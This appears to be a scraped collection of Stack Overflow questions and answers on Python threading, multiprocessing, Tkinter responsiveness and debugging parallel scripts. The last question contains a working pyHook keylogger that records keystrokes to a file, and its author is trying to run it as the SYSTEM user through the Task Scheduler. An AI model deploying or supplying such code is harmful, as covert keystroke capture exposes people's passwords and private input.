when I use threading.Thread to create new thread.it can not start. The code like this
import threading
import time
import sys
def worker():
count = 1
while True:
if count >= 6:
break
time.sleep(1)
count += 1
print("thread name = {}, thread id = {}".format(threading.current_thread().name,threading.current_thread().ident))
t1 = threading.Thread(target=worker,name="t1")
t2 = threading.Thread(target=worker,name='t2')
t1.start()
t2.start()
t1.join()
t2.join()
When I run this code. The windbg will not report error 、not print any thing and never return
enter image description here
I will to create new thread to run something
Don't use 'threading' within windbg. Windbg has own multithreading model and loop of debug events. It is near impossible to run all this threads together without bugs.
In fact I dont't recomend to use 'threading' also in standalone python program with pykd module. All my scripts always use 'multiprocessing' module.
Related
I am trying to allow a user to input multiple answers but only within an allocated amount of time. The problem is I have it running but the program will not interrupt the input. The program will only stop the user from inputing if the user inputs an answer after the time ends. Any ideas? Is what I am trying to do even possible in python?
I have tried using threading and the signal module however they both result in the same issue.
Using Signal:
import signal
def handler(signum, frame):
raise Exception
def answer_loop():
score = 0
while True:
answer = input("Please input your answer")
signal.signal(signal.SIGALRM, handler)
signal.alarm(5)
try:
answer_loop()
except Exception:
print("end")
signal.alarm(0)
Using Threading:
from threading import Timer
def end():
print("Time is up")
def answer_loop():
score = 0
while True:
answer = input("Please input your answer")
time_limit = 5
t = Timer(time_limit, end)
t.start()
answer_loop()
t.cancel()
Your problem is that builtin input does not have a timeout parameter and, AFAIK, threads cannot be terminated by other threads. I suggest instead that you use a GUI with events to finely control user interaction. Here is a bare bones tkinter example.
import tkinter as tk
root = tk.Tk()
label = tk.Label(root, text='answer')
entry = tk.Entry(root)
label.pack()
entry.pack()
def timesup():
ans = entry.get()
entry.destroy()
label['text'] = f"Time is up. You answered {ans}"
root.after(5000, timesup)
root.mainloop()
I'm running Jupyter 5.0.0 notebook with Python 3.5.3 on Windows 10. The following example code fails to run:
from concurrent.futures import as_completed, ProcessPoolExecutor
import time
import numpy as np
def do_work(idx1, idx2):
time.sleep(0.2)
return np.mean([idx1, idx2])
with ProcessPoolExecutor(max_workers=4) as executor:
futures = set()
for idx in range(32):
future = winprocess.submit(
executor, do_work, idx, idx * 2
)
futures.add(future)
for future in as_completed(futures):
print(future.result())
... and throws BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending.
The code works perfectly fine on Ubuntu 14.04.
I've understand that Windows doesn't have os.fork, thus multiprocessing is handled differently, and doesn't always play nice with interactive mode and Jupyter.
What are some workarounds to make ProcessPoolExecutor work in this case?
There are some similar questions, but they relate to multiprocessing.Pool:
multiprocessing.Pool in jupyter notebook works on linux but not windows
Closer inspection shows that a Jupyter notebook can run external python modules which is parallelized using ProcessPoolExecutor. So, a solution is to do the parallelizable part of your code in a module and call it from the Jupyter notebook.
That said, this can be generalized as a utility. The following can be stored as a module, say, winprocess.py and imported by jupyter.
import inspect
import types
def execute_source(callback_imports, callback_name, callback_source, args):
for callback_import in callback_imports:
exec(callback_import, globals())
exec('import time' + "\n" + callback_source)
callback = locals()[callback_name]
return callback(*args)
def submit(executor, callback, *args):
callback_source = inspect.getsource(callback)
callback_imports = list(imports(callback.__globals__))
callback_name = callback.__name__
future = executor.submit(
execute_source,
callback_imports, callback_name, callback_source, args
)
return future
def imports(callback_globals):
for name, val in list(callback_globals.items()):
if isinstance(val, types.ModuleType) and val.__name__ != 'builtins' and val.__name__ != __name__:
import_line = 'import ' + val.__name__
if val.__name__ != name:
import_line += ' as ' + name
yield import_line
Here is how you would use this:
from concurrent.futures import as_completed, ProcessPoolExecutor
import time
import numpy as np
import winprocess
def do_work(idx1, idx2):
time.sleep(0.2)
return np.mean([idx1, idx2])
with ProcessPoolExecutor(max_workers=4) as executor:
futures = set()
for idx in range(32):
future = winprocess.submit(
executor, do_work, idx, idx * 2
)
futures.add(future)
for future in as_completed(futures):
print(future.result())
Notice that executor has been changed with winprocess and the original executor is passed to the submit function as a parameter.
What happens here is that the notebook function code and imports are serialized and passed to the module for execution. The code is not executed until it is safely in a new process, thus does not trip up with trying to make a new process based on the jupyter notebook itself.
Imports are handled in such a way as to maintain aliases. The import magic can be removed if you make sure to import everything needed for the function being executed inside the function itself.
Also, this solution only works if you pass all necessary variables as arguments to the function. The function should be static so to speak, but I think that's a requirement of ProcessPoolExecutor as well. Finally, make sure you don't execute other functions defined elsewhere in the notebook. Only external modules will be imported, thus other notebook functions won't be included.
I use the Spyder IDE. Usually, when I am running non-parallelized scripts, I tend to debug using print statements. Depending on which statements are printed (or not), I can see where errors are occurring.
For example:
print "Started while loop..."
doWhileLoop = False
while doWhileLoop == True:
print "Doing something important!"
time.sleep(5)
print "Finished while loop..."
Above, I am missing a line that changes doWhileLoop to False at some point, so I will be stuck perpetually in the while loop, but my print statements let me see where it is in my code that I have hung up.
However, when running scripts that are parallelized, I get no output to the console until after the process has finished. Normally, what I do in this case is attempt to debug with a single process (i.e. temporarily deparallelize the program by running only one task, for instance), but currently, I am dealing with an error that seems to occur only when I am running more than one task.
So, I am having trouble figuring out what this error is using my usual methods -- how should I change my usual debugging practice in order to efficiently debug scripts employing multiprocessing?
Like #roippi said, debugging parallel things is hard. Another tool is using logging over print. Logging gives you severity, timestamps, and most importantly which process is doing something.
Example code:
import logging, multiprocessing, Queue
def myproc(arg):
return arg*2
def worker(inqueue, outqueue):
mylog = multiprocessing.get_logger()
mylog.info('start')
for job in iter(inqueue.get, 'STOP'):
mylog.info('got %s', job)
try:
outqueue.put( myproc(job), timeout=1 )
except Queue.Full:
mylog.error('queue full!')
mylog.info('done')
def executive(inqueue):
total = 0
mylog = multiprocessing.get_logger()
for num in iter(inqueue.get, 'STOP'):
total += num
mylog.info('got {}\ttotal{}', job, total)
logger = multiprocessing.log_to_stderr(
level=logging.INFO,
)
logger.info('setup')
inqueue, outqueue = multiprocessing.Queue(), multiprocessing.Queue()
if 0: # debug 'queue full!' issues
outqueue = multiprocessing.Queue(maxsize=1)
# prefill with 3 jobs
for num in range(3):
inqueue.put(num)
# signal end of jobs
inqueue.put('STOP')
worker_p = multiprocessing.Process(
target=worker, args=(inqueue, outqueue),
name='worker',
)
worker_p.start()
worker_p.join()
logger.info('done')
Example output:
[INFO/MainProcess] setup
[INFO/worker] child process calling self.run()
[INFO/worker] start
[INFO/worker] got 0
[INFO/worker] got 1
[INFO/worker] got 2
[INFO/worker] done
[INFO/worker] process shutting down
[INFO/worker] process exiting with exitcode 0
[INFO/MainProcess] done
[INFO/MainProcess] process shutting down
I have a simple GUI which run various scripts from another python file, everything works fine until the GUI is running a function which includes a while loop, at which point the GUI seems to crash and become in-active. Does anybody have any ideas as to how this can be overcome, as I believe this is something to do with the GUI being updated,Thanks. Below is a simplified version of my GUI.
GUI
#!/usr/bin/env python
# Python 3
from tkinter import *
from tkinter import ttk
from Entry import ConstrainedEntry
import tkinter.messagebox
import functions
AlarmCode = "2222"
root = Tk()
root.title("Simple Interface")
mainframe = ttk.Frame(root, padding="3 3 12 12")
mainframe.grid(column=0, row=0, sticky=(N, W, E, S))
mainframe.columnconfigure(0, weight=1)
mainframe.rowconfigure(0, weight=1)
ttk.Button(mainframe, width=12,text="ButtonTest",
command=lambda: functions.test()).grid(
column=5, row=5, sticky=SE)
for child in mainframe.winfo_children():
child.grid_configure(padx=5, pady=5)
root.mainloop()
functions
def test():
period = 0
while True:
if (period) <=100:
time.sleep(1)
period +=1
print(period)
else:
print("100 seconds has passed")
break
What will happen in the above is that when the loop is running the application will crash. If I insert a break in the else statement after the period has elapsed, everything will work fine. I want users to be able to click when in loops as this GUI will run a number of different functions.
Don't use time.sleep in the same thread than your Tkinter code: it freezes the GUI until the execution of test is finished. To avoid this, you should use after widget method:
# GUI
ttk.Button(mainframe, width=12,text="ButtonTest",
command=lambda: functions.test(root))
.grid(column=5, row=5, sticky=SE)
# functions
def test(root, period=0):
if period <= 100:
period += 1
print(period)
root.after(1000, lambda: test(root, period))
else:
print("100 seconds has passed")
Update:
In your comment you also add that your code won't use time.sleep, so your original example may not be the most appropiate. In that case, you can create a new thread to run your intensive code.
Note that I posted the alternative of after first because multithreading should be used only if it is completely necessary - it adds overhead to your applicacion, as well as more difficulties to debug your code.
from threading import Thread
ttk.Button(mainframe, width=12,text="ButtonTest",
command=lambda: Thread(target=functions.test).start())
.grid(column=5, row=5, sticky=SE)
# functions
def test():
for x in range(100):
time.sleep(1) # Simulate intense task (not real code!)
print(x)
print("100 seconds has passed")
Using Windows 7, Python 2.7 I wrote and compiled the code below (with pyinstaller2-0) and it works fine if I start it by right clicking and choose run as admin, but when I start it through the task scheduler as the system user, it does not log any keys (after the 10 second wait, it just creates an empty output file). I'm thinking maybe because I'm running it as a different account, its not hooking the "correct keyboard"?
import threading
import pyHook
import pythoncom
import time
def OnKeyboardEvent(event):
global keylog
keylog.append(chr(event.Ascii))
return
class thekeylogger ( threading.Thread ):
def run ( self ):
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
return
keylog = []
thekeylogger().start()
time.sleep(10)
keys = "".join(keylog)
output_file = open('c:\\project\\test.txt', 'w')
output_file.write(keys)
output_file.close()